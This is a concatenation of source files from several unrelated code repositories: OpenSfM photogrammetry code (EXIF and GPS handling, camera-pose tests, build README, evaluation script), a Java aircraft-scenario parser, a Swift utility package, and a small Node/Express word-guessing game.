    """Build a normalized lower-case '<make> <model>' key for sensor lookup.

    When the make is known it is stripped out of the model string first, so
    a model that repeats the make does not produce a duplicated key.
    """
    if make != 'unknown':
        model = model.replace(make, '')
    combined = '{0} {1}'.format(make.strip(), model.strip())
    return combined.lower()
def extract_exif_from_dict(exif_image):
    """Build the internal EXIF summary dict from a pre-parsed metadata dict.

    Missing fields fall back to neutral defaults ('unknown' camera, zero
    focal/distortion, -1 sizes). The GPS accuracy ('dop') is only kept when
    a non-negative value was provided.
    """
    make = exif_image.get('make', 'unknown')
    model = exif_image.get('model', 'unknown')
    sensor = sensor_string(make, model)

    fmm35 = float(exif_image.get('fmm35', 0))
    fmm = float(exif_image.get('fmm', 0))
    focal_35, focal_ratio = compute_focal(fmm35, fmm, None, sensor)

    # GPS block; drop 'dop' again when no valid accuracy was supplied.
    geo = {
        'latitude': float(exif_image.get('lat', 0.0)),
        'longitude': float(exif_image.get('lon', 0.0)),
        'altitude': float(exif_image.get('altitude', 0.0)),
        'dop': float(exif_image.get('gps_accuracy', -1)),
    }
    if geo['dop'] < 0:
        del geo['dop']

    return {
        'width': exif_image.get('width', -1),
        'height': exif_image.get('height', -1),
        'focal_ratio': focal_ratio,
        'focal_35mm_equiv': focal_35,
        'camera': sensor,
        'orientation': exif_image.get('orientation', 1),
        'k1': exif_image.get('k1', 0),
        'k2': exif_image.get('k2', 0),
        'gps': geo
    }
def extract_exif_from_file(fileobj):
    # Accept either a filesystem path (opened here) or an already-open file
    # object. NOTE: the `unicode` builtin makes this Python-2-only.
    if isinstance(fileobj, (str, unicode)):
        with open(fileobj) as f:
            exif_data = EXIF(f)
    else:
        exif_data = EXIF(fileobj)

    d = exif_data.extract_exif()
    return d
class EXIF:
    """Thin wrapper around exifread that extracts the metadata OpenSfM needs."""

    def __init__(self, fileobj):
        # Parse all EXIF tags once; the extract_* methods only read them.
        self.tags = exifread.process_file(fileobj, details=False)

    def extract_image_size(self):
        """Return (width, height) in pixels, or (-1, -1) when unavailable."""
        has_size = ('EXIF ExifImageWidth' in self.tags
                    and 'EXIF ExifImageLength' in self.tags)
        if not has_size:
            return -1, -1
        width = int(self.tags['EXIF ExifImageWidth'].values[0])
        height = int(self.tags['EXIF ExifImageLength'].values[0])
        return width, height

    def extract_make(self):
        """Camera (or lens) make; 'unknown' when not recorded."""
        for tag_name in ('EXIF LensMake', 'Image Make'):
            if tag_name in self.tags:
                return self.tags[tag_name].values
        return 'unknown'

    def extract_model(self):
        """Camera (or lens) model; 'unknown' when not recorded."""
        for tag_name in ('EXIF LensModel', 'Image Model'):
            if tag_name in self.tags:
                return self.tags[tag_name].values
        return 'unknown'

    def extract_focal(self):
        """Return (focal_35mm_equivalent, focal_ratio) for this camera."""
        make, model = self.extract_make(), self.extract_model()
        return compute_focal(
            get_float_tag(self.tags, 'EXIF FocalLengthIn35mmFilm'),
            get_frac_tag(self.tags, 'EXIF FocalLength'),
            get_frac_tag(self.tags, 'EXIF CCD width'),
            sensor_string(make, model))

    def extract_orientation(self):
        """EXIF orientation flag; defaults to 1 when not recorded."""
        if 'Image Orientation' not in self.tags:
            return 1
        return self.tags.get('Image Orientation').values[0]

    def extract_distortion(self):
        """Return (k1, k2) default radial distortion for this camera."""
        make, model = self.extract_make(), self.extract_model()
        fmm35, fratio = self.extract_focal()
        distortion = get_distortion(make, model, fmm35)
        return distortion[0], distortion[1]

    def extract_lon_lat(self):
        """Return (longitude, latitude) in decimal degrees, or (None, None)."""
        if 'GPS GPSLatitude' not in self.tags:
            return None, None
        lat = gps_to_decimal(self.tags['GPS GPSLatitude'].values,
                             self.tags['GPS GPSLatitudeRef'].values)
        lon = gps_to_decimal(self.tags['GPS GPSLongitude'].values,
                             self.tags['GPS GPSLongitudeRef'].values)
        return lon, lat

    def extract_altitude(self):
        """GPS altitude value, or None when not recorded."""
        if 'GPS GPSAltitude' not in self.tags:
            return None
        return eval_frac(self.tags['GPS GPSAltitude'].values[0])

    def extract_dop(self):
        """GPS dilution of precision, or None when not recorded."""
        if 'GPS GPSDOP' not in self.tags:
            return None
        return eval_frac(self.tags['GPS GPSDOP'].values[0])

    def extract_geo(self):
        """Collect the available GPS fields into a dict (possibly empty)."""
        altitude = self.extract_altitude()
        dop = self.extract_dop()
        lon, lat = self.extract_lon_lat()
        d = {}
        if lon is not None and lat is not None:
            d['latitude'] = lat
            d['longitude'] = lon
        if altitude is not None:
            d['altitude'] = altitude
        if dop is not None:
            d['dop'] = dop
        return d

    def extract_exif(self):
        """Assemble the full EXIF summary dict used across OpenSfM."""
        width, height = self.extract_image_size()
        focal_35, focal_ratio = self.extract_focal()
        make, model = self.extract_make(), self.extract_model()
        distortion = self.extract_distortion()
        return {
            'width': width,
            'height': height,
            'focal_ratio': focal_ratio,
            'focal_35mm_equiv': focal_35,
            'camera': sensor_string(make, model),
            'orientation': self.extract_orientation(),
            'k1': distortion[0],
            'k2': distortion[1],
            'gps': self.extract_geo()
        }
<file_sep>#!/usr/bin/env python
import os.path, sys
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), "..")))
import argparse
import json
import numpy as np
import opensfm.reconstruction as rc
import opensfm.io as io
from opensfm import dataset
from opensfm import exif
from opensfm.geotag_from_gpx import add_gps_to_exif
parser = argparse.ArgumentParser(
description="Align reconstruction with exif geotag information.")
parser.add_argument('dataset',
help='path to the dataset to be processed')
parser.add_argument('--output',
help='file where to store the aligned reconstruction.'
' By default, the original reconstruction is overwritten')
parser.add_argument('--image_path',
help='path to images')
args = parser.parse_args()
data_path = args.dataset
# handle GPS data
data = dataset.DataSet(data_path) # assumes that the images is in data_path/'images'
if args.image_path: data.set_image_path(args.image_path)
images = data.images()
for image in images:
if not data.load_exif(image)):
dexif = exif.EXIF(data.load_image(image))
exif_data = dexif.extract_exif()
data.save_exif(image, exif_data)
reconstructions = data.load_reconstruction()
# reference for conversion
try:
reference = data.load_reference_lla()
except:
reference = data.invent_reference_lla()
# alignment
for reconstruction in reconstructions:
for image in reconstruction['shots'].keys():
rc.add_gps_position(data, reconstruction, image)
rc.align_reconstruction(reconstruction, data.config)
# convert to lla
# reference = data.invent_reference_lla(list(reconstruction['shots'].keys()))
rc.register_reconstruction_with_gps(reconstruction, reference)
data.save_reconstruction(reconstructions, filename=args.output)
<file_sep>// Copyright (c) 2007, 2008 libmv authors.
//
// Permission is hereby granted, free of charge, to any person obtaining a copy
// of this software and associated documentation files (the "Software"), to
// deal in the Software without restriction, including without limitation the
// rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
// sell copies of the Software, and to permit persons to whom the Software is
// furnished to do so, subject to the following conditions:
//
// The above copyright notice and this permission notice shall be included in
// all copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
// IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
// FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
// AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
// LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
// FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
// IN THE SOFTWARE.
#include <iostream>
#include <algorithm>
#include "libmv/base/vector.h"
#include "libmv/multiview/fundamental.h"
#include "libmv/multiview/robust_five_point.h"
#include "libmv/multiview/fundamental_test_utils.h"
#include "libmv/multiview/projection.h"
#include "libmv/multiview/test_data_sets.h"
#include "libmv/numeric/numeric.h"
#include "testing/testing.h"
#include "libmv/logging/logging.h"
namespace {
using namespace libmv;
TEST(RobustFivePoint, FivePointAlgorithmRobustNoOutliers) {
TwoViewDataSet d = TwoRealisticCameras();
Mat3 E_estimated;
vector<int> inliers;
FivePointAlgorithmRobust(d.x1, d.x2, d.K1, d.K2,
1.0, &E_estimated, &inliers);
EXPECT_EQ(d.x1.cols(), inliers.size());
Mat3 E_gt;
EssentialFromRt(d.R1, d.t1, d.R2, d.t2, &E_gt);
// Normalize.
Mat3 E_gt_norm, E_estimated_norm;
NormalizeFundamental(E_gt, &E_gt_norm);
NormalizeFundamental(E_estimated, &E_estimated_norm);
LOG(INFO) << "E_gt_norm =\n" << E_gt_norm;
LOG(INFO) << "E_estimated_norm =\n" << E_estimated_norm;
EXPECT_MATRIX_NEAR(E_gt_norm, E_estimated_norm, 1e-8);
}
TEST(RobustFivePoint, FivePointAlgorithmRobust) {
TwoViewDataSet d = TwoRealisticCameras();
d.X = 3 * Mat::Random(3, 50);
LOG(INFO) << "X = \n" << d.X;
Project(d.P1, d.X, &d.x1);
Project(d.P2, d.X, &d.x2);
LOG(INFO) << "x1 = \n" << d.x1;
LOG(INFO) << "x2 = \n" << d.x2;
Mat x1s, x2s;
HorizontalStack(d.x1, 400 * Mat::Random(2, 20), &x1s);
HorizontalStack(d.x2, 400 * Mat::Random(2, 20), &x2s);
// Compute Essential matrix from correspondences.
Mat3 E_estimated;
vector<int> inliers;
FivePointAlgorithmRobust(x1s, x2s, d.K1, d.K2,
1.0, &E_estimated, &inliers);
LOG(ERROR) << "Number of inliers = " << inliers.size();
EXPECT_LE(d.x1.cols(), inliers.size()); // Some outliers may be considered
// inliers, that's fine.
Mat3 E_gt;
EssentialFromRt(d.R1, d.t1, d.R2, d.t2, &E_gt);
// Normalize.
Mat3 E_gt_norm, E_estimated_norm;
NormalizeFundamental(E_gt, &E_gt_norm);
NormalizeFundamental(E_estimated, &E_estimated_norm);
LOG(INFO) << "E_gt_norm =\n" << E_gt_norm;
LOG(INFO) << "E_estimated_norm =\n" << E_estimated_norm;
EXPECT_MATRIX_NEAR(E_gt_norm, E_estimated_norm, 1e-8);
}
} // namespace
<file_sep>#ifndef __HAHOG_H__
#define __HAHOG_H__
#include "types.h"
namespace csfm {
bp::object hahog(PyObject *image,
float peak_threshold,
float edge_threshold);
}
#endif // __HAHOG_H__
<file_sep>
#include "libmv/multiview/robust_five_point.h"
#include "libmv/multiview/fundamental.h"
#include "libmv/multiview/projection.h"
#include "libmv/multiview/nviewtriangulation.h"
#include "libmv/tools/tool.h"
#include <iostream>
#include <fstream>
#include <string>
#include "types.h"
namespace csfm {
bp::object TwoViewReconstruction(PyObject *x1_object,
PyObject *x2_object,
double focal1,
double focal2,
double threshold) {
using namespace libmv;
PyArrayContiguousView<double> x1_array((PyArrayObject *)x1_object);
PyArrayContiguousView<double> x2_array((PyArrayObject *)x2_object);
assert(x1_array.shape(0) == x2_array.shape(0));
assert(x1_array.shape(1) == 2);
assert(x2_array.shape(1) == 2);
// Create matches matrices.
int n_matches = x1_array.shape(0);
LOG(INFO) << "Num matches: " << n_matches;
if (n_matches < 5) return bp::object();
Eigen::Map<const libmv::Mat> x1(x1_array.data(), 2, n_matches);
Eigen::Map<const libmv::Mat> x2(x2_array.data(), 2, n_matches);
// Create calibration matrices.
Mat3 K1, K2;
K1 << focal1, 0, 0,
0, focal1, 0,
0, 0, 1;
K2 << focal2, 0, 0,
0, focal2, 0,
0, 0, 1;
// Compute Essential matrix.
Mat3 E;
vector<int> inliers;
FivePointAlgorithmRobust(x1, x2, K1, K2,
threshold, &E, &inliers);
LOG(INFO) << "Num inliers: " << inliers.size();
if (inliers.size() < 5) return bp::object();
// Compute R and t.
Mat3 R;
Vec3 t;
int a = inliers[inliers.size() / 2]; // Choose a random inlier.
MotionFromEssentialAndCorrespondence(E,
K1, x1.col(a),
K2, x2.col(a),
&R, &t);
// Convert results to numpy arrays.
Eigen::Matrix<double, 3, 3, Eigen::RowMajor> R_row_major = R;
bp::list retn;
npy_intp R_shape[2] = {3, 3};
npy_intp t_shape[1] = {3};
npy_intp inliers_shape[1] = {inliers.size()};
retn.append(bpn_array_from_data(2, R_shape, R_row_major.data()));
retn.append(bpn_array_from_data(1, t_shape, t.data()));
retn.append(bpn_array_from_data(1, inliers_shape, &inliers[0]));
return retn;
}
}
<file_sep>#!/usr/bin/env python
'''
Script for writing GPS positions from reconstruction to the images.
It requires the reconstruction
'''
import os, sys
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), "..")))
import argparse
import json
import numpy as np
import pyexiv2
from opensfm import dataset
from opensfm.geotag_from_gpx import add_gps_to_exif
parser = argparse.ArgumentParser(
description='Write updated geotag information to image files.'
' It requires a reconstruction with updated GPS positions.'
' This can be obtained by running the bin/align script.')
parser.add_argument('dataset',
help='path to the dataset to be processed')
parser.add_argument('--overwrite_originals',
help='write geotag back to the original images.'
' By default, the updated images are written in dataset/images_updated_geotag'
' and the original images are not overwritten.',
action='store_true')
parser.add_argument('--image_path',
help='path to images')
args = parser.parse_args()
# This script assumes that the reconstruction contains aligned gps, altitude and direction information about the images (after bin/align data_path)
data_path = args.dataset
data = dataset.DataSet(data_path) # assumes that the images is in data_path/'images'
if args.image_path: data.set_image_path(args.image_path)
updated_image_path = os.path.join(data.data_path, 'images_updated_geotag')
if not args.overwrite_originals and not os.path.exists(updated_image_path):
os.makedirs(updated_image_path)
reconstructions = data.load_reconstruction()
for reconstruction in reconstructions:
# write updated gps/compass to the image file
for image in reconstruction['shots'].keys():
image_path = data.image_file(image)
new_image_path = None if args.overwrite_originals else os.path.join(updated_image_path, image)
gps = reconstruction['shots'][image]['gps']
add_gps_to_exif(image_path, gps['lat'], gps['lon'], gps['altitude'], gps['direction'], new_image_path)
<file_sep>OpenSfM
=======
Structure from Motion library written in Python on top of OpenCV.
## Dependencies
* [OpenCV][]
* [Ceres Solver][]
* [Boost Python][]
* [NumPy][], [SciPy][], networkx, PyYAML, exifread
### Installing dependencies on MacOSX
Use
brew tap homebrew/science
brew install opencv
brew install homebrew/science/ceres-solver
brew install boost
sudo pip install -r requirements.txt
Be sure to update your `PYTHONPATH` to include `/usr/local/lib/python2.7/site-packages` where OpenCV has been installed:
export PYTHONPATH=/usr/local/lib/python2.7/site-packages:$PYTHONPATH
### Installing dependencies on Ubuntu
1. [OpenCV][] - Install by following the steps in the Ubuntu OpenCV [installation guide](https://help.ubuntu.com/community/OpenCV). An alternative instruction tested for Ubuntu 10.04 can be found at [OpenCV Docs](http://docs.opencv.org/doc/tutorials/introduction/linux_install/linux_install.html). OpenCV requires [GCC](https://gcc.gnu.org/) and [CMake](http://www.cmake.org/) among other things.
2. [Ceres solver][] - Build Ceres according the [documentation](http://ceres-solver.org/building.html). Make sure to read the Linux note, follow the shared library instructions and compile Ceres with the -fPIC option. Install Ceres from the ceres-bin directory after `make` by:
sudo make install
3. [Boost Python][] - Install through apt-get:
sudo apt-get install libboost-python-dev
4. [NumPy][], networkx, PyYaml, exifread - Install [pip](https://pypi.python.org/pypi/pip) and then run the following from the root of the project:
sudo pip install -r requirements.txt
5. [SciPy][] - Install [gfortran](https://gcc.gnu.org/wiki/GFortran) through apt-get and then install [SciPy][] with:
sudo apt-get install gfortran
sudo pip install scipy
## Building inplace using setup.py
python setup.py build_clib
python setup.py build_ext --inplace
## Building using CMake
mkdir build
cd build
cmake ../opensfm/src
make
## Running
An example dataset is available at `data/berlin`.
1. Put some images in `data/DATASET_NAME/images/`
2. Put config.yaml in `data/DATASET_NAME/config.yaml`
3. Go to the root of the project and run `bin/run_all data/DATASET_NAME`
4. Start an http server from the root with `python -m SimpleHTTPServer`
5. Browse `http://localhost:8000/viewer/reconstruction.html#file=/data/DATASET_NAME/reconstruction.json`.
[OpenCV]: http://opencv.org/ (Computer vision and machine learning software library)
[NumPy]: http://www.numpy.org/ (Scientific computing with Python)
[SciPy]: http://www.scipy.org/ (Fundamental library for scientific computing)
[Ceres solver]: http://ceres-solver.org/ (Library for solving complicated nonlinear least squares problems)
[Boost Python]: http://www.boost.org/
<file_sep>#!/usr/bin/env python
import sys, os
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), "..")))
import datetime
from subprocess import call
import urllib
import json
import numpy as np
import cv2
from opensfm import dataset
from opensfm import multiview
from opensfm import reconstruction
from opensfm import transformations as tf
def run_dataset(run_root, name):
folder = run_root + '/' + name
call(['cp', 'config.yaml', folder])
call(['bin/run_all', folder])
with open(run_root + '/index.html', 'a') as fout:
s = '''
<a href="/viewer/reconstruction.html#file=../{0}/reconstruction.json">{1}</a><br>
'''.format(urllib.quote(folder), name)
fout.write(s)
def align_reconstructions(rgt, r):
if len(r['shots']) < 3: return
# Compute similarity Xp = s A X + b
X, Xp = [], []
for key in rgt['shots']:
if key in r['shots']:
X.append(reconstruction.optical_center(r['shots'][key]))
Xp.append(reconstruction.optical_center(rgt['shots'][key]))
else:
print 'Shot {0} missing.'.format(key)
X = np.array(X)
Xp = np.array(Xp)
T = tf.superimposition_matrix(X.T, Xp.T, scale=True)
A, b = T[:3,:3], T[:3,3]
s = np.linalg.det(A)**(1./3)
A /= s
reconstruction.apply_similarity(r, s, A, b)
def optical_center_rms(rgt, r):
X = []
Xp = []
for key in r['shots']:
X.append(reconstruction.optical_center(r['shots'][key]))
Xp.append(reconstruction.optical_center(rgt['shots'][key]))
X = np.array(X)
Xp = np.array(Xp)
return np.sqrt(((X - Xp)**2).sum() / len(X))
def focal_length_rms(rgt, r):
f = []
fp = []
for key in r['shots']:
cam = r['shots'][key]['camera']
f.append(r['cameras'][cam]['focal'])
fp.append(rgt['cameras'][cam]['focal'])
f = np.array(f)
fp = np.array(fp)
return np.sqrt(((f - fp)**2).sum() / len(f))
def eval_reconstruction(name, rgt, r):
align_reconstructions(rgt, r)
f = focal_length_rms(rgt, r)
o = optical_center_rms(rgt, r)
print '#####################################################################'
print '# Evaluation for', name
print '# Focal lenght RMS error:', f
print '# Optical center RMS error:', o
print '#####################################################################'
return {
"focal_length_rms": f,
"optical_center_rms": o,
}
def load_strecha_gt_projections(run_root, name):
source = 'eval/datasets/{0}/urd'.format(name)
r = {
'cameras': {},
'shots': {},
}
for i in os.listdir(source):
if i.endswith('.png'):
P = np.loadtxt(source + '/' + i + '.P')
K, R, t = multiview.KRt_from_P(P)
r['cameras']['canon eos d60'] = {
'focal': K[0,0]
}
r['shots'][i] = {
'camera': 'canon eos d60',
'rotation': list(cv2.Rodrigues(R)[0].flat),
'translation': list(t.flat)
}
return r
def eval_strecha_dataset(run_root, name):
exif = {
"camera": "canon eos d60",
"focal_ratio": 0.881057268722467,
"focal_35mm_equiv": 31.718061674008812,
}
folder = run_root + '/' + name
source = '../../../datasets/{0}/urd'.format(name)
call(['mkdir', '-p', folder])
call(['ln', '-s', source, folder + '/images'])
with open(folder + '/exif_overrides.json', 'w') as fout:
d = { '%04d.png'%i: exif for i in range(30)}
json.dump(d, fout, indent=4)
run_dataset(run_root, name)
with open(folder+'/reconstruction.json') as fin:
r = json.load(fin)[0]
rgt = load_strecha_gt_projections(run_root, name)
return eval_reconstruction(name, rgt, r)
if __name__ == '__main__':
if len(sys.argv) == 2:
run_root = sys.argv[1]
else:
run_root = 'eval/runs/' + datetime.datetime.now().isoformat()
# Create evaluation folders
call(['mkdir', '-p', run_root])
# Bundler examples
# for i in ['ET', 'kermit']:
# a = run_root + '/' + i
# call(['mkdir', '-p', a])
# call(['ln', '-s', '../../../datasets/bundler-v0.4-source/examples/' + i, a + '/images'])
# Strecha datasets
results = {}
for name in [
'fountain_dense',
'herzjesu_dense',
'castle_entry_dense',
'castle_dense',
'herzjesu_dense_large',
'castle_dense_large',
]:
results[name] = eval_strecha_dataset(run_root, name)
with open(run_root + '/results.json', 'w') as fout:
json.dump(results, fout, indent=4)
| a5bc815f9d1cb33c1839cb3e88bfea704bccd3df | [
"Markdown",
"Python",
"Text",
"C++",
"Shell"
] | 24 | Python | ktuite/OpenSfM | 3e83cb073e52e6c044ce1e8d66d6307365b4e672 | d3b7b53677899fbe4d86675a49cad413a09aeac2 |
refs/heads/master | <file_sep>#!/bin/sh
javac defPack/*.java
<file_sep>package defPack;
import java.io.BufferedReader;
import java.io.IOException;
import java.util.ArrayList;
public class Parser {
private BufferedReader reader;
private ArrayList<Flyable> flyables;
private AircraftFactory factory;
private WeatherTower tower;
private int changes;
public Parser(BufferedReader reader) {
this.reader = reader;
this.factory = new AircraftFactory();
this.tower = new WeatherTower();
this.flyables = new ArrayList<Flyable>();
this.changes = 0;
extractObjects();
}
public ArrayList<Flyable> getFlyables() {
return flyables;
}
public AircraftFactory getFactory() {
return factory;
}
public WeatherTower getTower() {
return tower;
}
public int getChanges() {
return changes;
}
private void extractObjects() {
String[] parse;
String line = null;
int i = 0;
try {
while ((line = reader.readLine()) != null) {
if (line.isEmpty()) {
System.out.println("Error: first line of scenario file must be an integer.");
continue;
}
if (line != null && !line.isEmpty() && i == 0) {
try {
this.changes = Integer.parseInt(line);
i++;
} catch (NumberFormatException nfe) {
System.out.println("Error: first line of scenario file must be an integer.");
return;
}
} else if (!line.isEmpty() && i != 0) {
parse = line.split(" ");
if (parse.length != 5) {
System.out.println("=))))) Error on line " + i + "! String should have the type, name, coordinate x, coordinate y and coordinate z ");
System.exit(1);
return;
} else {
try {
String aircraftType = parse[0].toLowerCase();
String name = parse[1];
int longitude = Integer.parseInt(parse[2]);
int latitude = Integer.parseInt(parse[3]);
int height = Integer.parseInt(parse[4]);
Flyable newFLyable = factory.newAircraft(aircraftType, name, longitude, latitude, height);
if (newFLyable != null) {
flyables.add(newFLyable);
} else {
System.out.println("Error on line " + i + ": The aircraft \"" + aircraftType + "\" could'n be created.");
}
} catch (NumberFormatException nfe) {
System.out.println("Error on line " + i + ": coordinates should be valid numbers integers. No aircraft was created.");
return;
} catch (Exception ex) {
System.out.println("Error: on line " + i + ":\n" + ex.getLocalizedMessage());
return;
}
}
}
i++;
}
} catch (IOException e) {
e.printStackTrace();
}
}
}
<file_sep>package defPack;
public class WeatherUpdateResult {
public int addLongitude;
public int addLatitude;
public int addHeight;
public String message;
public WeatherUpdateResult(int addLongitude, int addLatitude, int addHeight, String message) {
this.addLongitude = addLongitude;
this.addLatitude = addLatitude;
this.addHeight = addHeight;
this.message = message;
}
public int getAddLongitude() {
return addLongitude;
}
public int getAddLatitude() {
return addLatitude;
}
public int getAddHeight() {
return addHeight;
}
public String getMessage() {
return message;
}
}
| fba0287bcf6f7ec9b4f913d3137ae800f3f7473f | [
"Java",
"Shell"
] | 3 | Shell | aalokhin/avaj_Jenkins_test | 77d3bb67995823f7351c2b6837a266938c4e7bd2 | d676f9e36907867e50cc7515a6f350dbd74e04b9 |
refs/heads/master | <repo_name>v-jyveer/test<file_sep>/notebooks/Users/v-jyveer@microsoft.com/init notebook.py
# Databricks notebook source
dbutils.fs.mkdirs("dbfs:/databricks/scripts/globalinit")
# COMMAND ----------
display(dbutils.fs.ls("dbfs:/databricks/scripts/globalinit/postgresql-install.sh"))
# COMMAND ----------
dbutils.fs.put("dbfs:/databricks/scripts/globalinit/postgresql-install.sh" ,"""
#!/bin/bash
echo "hello" >> /hello.txt
""", True)
# COMMAND ----------
# MAGIC %sh head /dbfs/databricks/scripts/globalinit/postgresql-install.sh
# COMMAND ----------
dbutils.fs.put("/databricks/scripts/globalinit/postgresql-install.sh","""
#!/bin/bash
wget --quiet -O /mnt/driver-daemon/jars/postgresql-42.2.2.jar http://central.maven.org/maven2/org/postgresql/postgresql/42.2.2/postgresql-42.2.2.jar
wget --quiet -O /mnt/jars/driver-daemon/postgresql-42.2.2.jar http://central.maven.org/maven2/org/postgresql/postgresql/42.2.2/postgresql-42.2.2.jar""", True)
# COMMAND ----------
display(dbutils.fs.ls("dbfs:/databricks/scripts/globalinit/"))
# COMMAND ----------
dbutils.fs.ls ("dbfs:/cluster-logs/")<file_sep>/README.md
# test
testing the first github code and usage
changes test
| a5f06805d7b59eface97e52758a0bcf70a144fe9 | [
"Markdown",
"Python"
] | 2 | Python | v-jyveer/test | 0d6698e0f630a3bb52e7aede6cb642225afab328 | 074bca792bfdeeade8b4ffcd1ea8ae4b365957e9 |
refs/heads/master | <repo_name>jorgegomezdeveloper/CustomToolsSTGPackage<file_sep>/Sources/CustomToolsSTGPackage/BorderTools.swift
//
// BorderTools.swift
// CustomToolsSTGPackage
//
// Created by Jorge GA-studiogenesis on 28/04/2021.
// Copyright © 2021 Jorge GA-studiogenesis. All rights reserved.
//
import SwiftUI
extension UIView {
public func setBorderLikeTextField() {
self.layer.cornerRadius = 4
self.layer.borderWidth = 0.9
self.layer.borderColor = #colorLiteral(red: 0.8235294118, green: 0.8235294118, blue: 0.8235294118, alpha: 1)
}
}
<file_sep>/README.md
# CustomToolsSTGPackage
A description of this package.
<file_sep>/Tests/LinuxMain.swift
import XCTest
import CustomToolsSTGPackageTests
var tests = [XCTestCaseEntry]()
tests += CustomToolsSTGPackageTests.allTests()
XCTMain(tests)
<file_sep>/Sources/CustomToolsSTGPackage/SoundVibrationTools.swift
//
// SoundVibrationTools.swift
// CustomToolsSTGPackage
//
// Created by <NAME> on 28/04/2021.
// Copyright © 2021 <NAME>-studiogenesis. All rights reserved.
//
import AVFoundation
public class SoundVibrationTools {
public init() {
}
public enum SoundExtensionType: String {
case wav
case mp3
case mp4
}
public func generateVibration() {
AudioServicesPlaySystemSound(kSystemSoundID_Vibrate)
}
public func generateSoundAlert(soundName: String = "", extentionFile: SoundExtensionType = .wav, soundId: Int = 1000) {
if let soundURL = Bundle.main.url(forResource: soundName, withExtension: extentionFile.rawValue) {
var mySound: SystemSoundID = 0
AudioServicesCreateSystemSoundID(soundURL as CFURL, &mySound)
AudioServicesPlaySystemSound(mySound);
} else {
AudioServicesPlayAlertSound(SystemSoundID(soundId))
}
}
}
<file_sep>/Sources/CustomToolsSTGPackage/EmailTools.swift
//
// EmailTools.swift
// CustomToolsSTGPackage
//
// Created by <NAME>-studiogenesis on 28/04/2021.
// Copyright © 2021 Jorge GA-studiogenesis. All rights reserved.
//
import SwiftUI
extension String {
public func isValidEmail() -> Bool {
let emailRegEx = "[A-Z0-9a-z._%+-]+@[A-Za-z0-9.-]+\\.[A-Za-z]{2,}"
let emailTest = NSPredicate(format: "SELF MATCHES %@", emailRegEx)
return emailTest.evaluate(with: self)
}
public func openEmail() {
if self.isValidEmail() {
if let url = URL(string: "mailto:\(self)") {
if #available(iOS 10.0, *) {
UIApplication.shared.open(url)
} else {
// Fallback on earlier versions
}
}
}
}
}
| 47abc524910e850a67643cba961c757e3b14ad08 | [
"Swift",
"Markdown"
] | 5 | Swift | jorgegomezdeveloper/CustomToolsSTGPackage | aed112f8f1e5fa0306f33257857c9e8b04405029 | 1e3b7695d080f00927ac048246f7fd2338f313b2 |
refs/heads/master | <file_sep># guesswho
A dumb game written late in the weekend
<file_sep>
class Application {
constructor() {
this.knownWords = new Set();
this.wordList = document.getElementById('list');
this.wordInput = document.getElementById('word');
const buttons = [1, 2, 3, 4, 5];
for (let i = 0; i < buttons.length; i++) {
const value = buttons[i];
document.getElementById('add-' + value)
.addEventListener('click', (_) => this.buttonClicked(value));
}
this.preloadWords();
}
buttonClicked(value) {
const word = this.wordInput.value;
this.addNewWord({ word: word, value: value });
}
preloadWords() {
fetch('/word-list/custom-words')
.then(words => words.json())
.then(words => {
const wordList = words['words'];
for (let i = 0; i < wordList.length; i++) {
this.addNewWord(wordList[i], false, false);
}
});
}
addNewWord(wordData, check = true, send = true) {
if (check) {
if (this.knownWords.has(wordData.word)) {
alert('Word already exists!');
return;
}
}
this.knownWords.add(wordData.word);
if (send)
this.sendWord(wordData);
this.addWordToList(wordData);
this.wordInput.focus();
}
addWordToList(wordData) {
const {word, value} = wordData;
const listItem = document.createElement('li');
const wordSpan = document.createElement('span');
const valueSpan = document.createElement('span');
wordSpan.innerText = word;
valueSpan.innerText = value.toString();
valueSpan.className = 'vl' + value;
listItem.appendChild(wordSpan);
listItem.appendChild(valueSpan);
this.wordList.insertBefore(listItem, this.wordList.firstChild);
this.wordInput.value = '';
}
sendWord(wordData) {
const response = fetch('/add-word/custom-words', {
method: 'POST',
headers: {
'Content-Type': 'application/json'
},
redirect: 'follow',
referrerPolicy: 'no-referrer',
body: JSON.stringify(wordData)
});
response.then(() => {});
}
};
window.runApp = () => {
const app = new Application();
};
console.log("loaded");
<file_sep>FROM node:12-alpine
USER node
WORKDIR /app
COPY package.json yarn.lock /app/
RUN yarn
COPY data/ /app/data/
COPY static/ /app/static/
COPY index.js /app/
EXPOSE 8080
CMD [ "yarn", "start" ]
<file_sep>const fs = require('fs');
const path = require('path');
const words = fs.readFileSync('./data/words.txt', { encoding: 'utf-8' }).split('\n');
const express = require('express');
const app = express();
app.use(express.json());
const static = express.static('./static');
app.use(static);
app.get('/word', (req, resp) => {
const choice = Math.floor(Math.random() * words.length);
resp.send(words[choice]);
});
app.get('/words', (req, resp) => {
resp.sendFile(path.join(__dirname, './static/words.html'));
});
app.get('/play/:duration', (req, resp) => {
resp.sendFile(path.join(__dirname, './static/index.html'));
});
app.get('/word-list/:list', (req, resp) => {
const listName = req.params['list'] || 'custom-words';
const listFile = path.join(__dirname, `db/${listName}.json`);
resp.sendFile(listFile);
});
app.post('/add-word/:list', (req, resp) => {
const listName = req.params['list'] || 'custom-words';
const listFile = path.join(__dirname, `db/${listName}.json`);
const newWord = req.body;
fs.promises.readFile(listFile, { encoding: 'utf-8' })
.then(data => JSON.parse(data))
.then(json => {
json['words'].push(newWord)
const jsonText = JSON.stringify(json, null, 2);
return fs.promises.writeFile(listFile, jsonText, { encoding: 'utf-8' })
})
.then(() => resp.send('ok'));
});
app.listen(8080, () => console.log("Server started!"));
| 1cef42858b1630e9d730ec6d3e3d18c5aa6c1641 | [
"Markdown",
"JavaScript",
"Dockerfile"
] | 4 | Markdown | MatanShahar/guesswho | 10519f03a49ea03e7af4c8e6967549284717e91b | 220b75ee8201276b9cf9e2ce74e9280bbf74bb08 |
